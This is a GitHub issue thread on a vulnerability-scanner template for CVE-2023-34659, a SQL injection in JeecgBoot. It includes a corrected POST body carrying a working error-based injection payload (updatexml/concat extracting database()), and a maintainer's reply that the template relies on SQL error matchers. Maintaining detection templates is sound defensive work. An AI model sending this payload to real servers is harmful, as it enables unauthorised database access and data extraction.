nuclei-templates

CVE-2023-34659 Exp change wanted

Open hi-unc1e opened this issue 1 year ago • 1 comments

https://github.com/projectdiscovery/nuclei-templates/blame/68d09a4eb0c155b00a53e1e99d1fb077d14425bf/http/cves/2023/CVE-2023-34659.yaml#L39C1-L40C1

Considering a valid JSON format, the POST_body should be

{"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '\"}"}

See https://github.com/jeecgboot/jeecg-boot/issues/4976

hi-unc1e, Feb 26 '24 06:02
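Added example, not part of the issue thread or of the nuclei-templates project: a small check that a request body of this shape is valid JSON at both levels, since `params` carries a second JSON document serialized as a string. The field names `id`, `apiUrl` and `params` come from the body quoted above; the function names and all sample values are constructed for illustration.

```python
import json

def check_nested_json_body(raw_body, nested_field="params"):
    """Return (ok, reason) for a body whose nested_field holds JSON as a string."""
    try:
        outer = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        return False, f"outer body is not valid JSON: {exc.msg} at char {exc.pos}"
    if not isinstance(outer, dict):
        return False, "outer body is not a JSON object"
    inner_raw = outer.get(nested_field)
    if not isinstance(inner_raw, str):
        return False, f"{nested_field!r} is missing or not a string"
    try:
        json.loads(inner_raw)
    except json.JSONDecodeError as exc:
        return False, f"{nested_field!r} does not contain valid JSON: {exc.msg}"
    return True, "outer and nested JSON both parse"

def build_body(record_id, inner):
    """Serialize the inner object first, then embed it as a string, so the
    serializer produces the escaped quotes instead of hand-written backslashes."""
    return json.dumps({"id": record_id, "apiUrl": "", "params": json.dumps(inner)})

# Constructed samples (benign placeholder values, not taken from the template).
GOOD = build_body("placeholder-id", {"id": "example-value"})
# Inner quotes left unescaped: the outer document no longer parses.
BAD_OUTER = '{"id":"placeholder-id","apiUrl":"","params":"{"id":"example-value"}"}'
# Outer document parses, but the string in params is missing its closing brace.
BAD_INNER = r'{"id":"placeholder-id","apiUrl":"","params":"{\"id\":\"example-value\""}'

if __name__ == "__main__":
    for name, body in (("GOOD", GOOD), ("BAD_OUTER", BAD_OUTER), ("BAD_INNER", BAD_INNER)):
        ok, reason = check_nested_json_body(body)
        print(f"{name}: {'ok' if ok else 'invalid'} ({reason})")
```
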

Hello, @hi-unc1e. Thank you for suggesting changes to the template. However, I noticed that the third image from the provided reference uses version() in the payload, which is the same as in the template. Furthermore, adding database() or version() will not impact the template because it depends entirely on SQL error matchers.

ritikchaddha, Feb 27 '24 06:02

Closing this issue due to inactivity. Feel free to reopen it if you have more information.

ritikchaddha, May 14 '24 04:05